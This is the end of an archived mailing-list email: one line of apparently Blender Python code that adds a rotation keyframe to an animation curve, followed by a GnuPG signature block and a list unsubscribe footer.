objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren= tFrame, z)) --4XGXW98AkZ9Jbbyi-- --rCIC/fLAoyeCowUM Content-Type: application/pgp-signature; name="signature.asc" Content-Description: Digital signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDe0gPs3U+TVFLPnwRAsOJAJwKcHodI3hm94NmszOkstSWHDdw4QCeL1la t53d/NXWgSNaukfPg3mQH4g= =9oHb -----END PGP SIGNATURE----- --rCIC/fLAoyeCowUM-- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]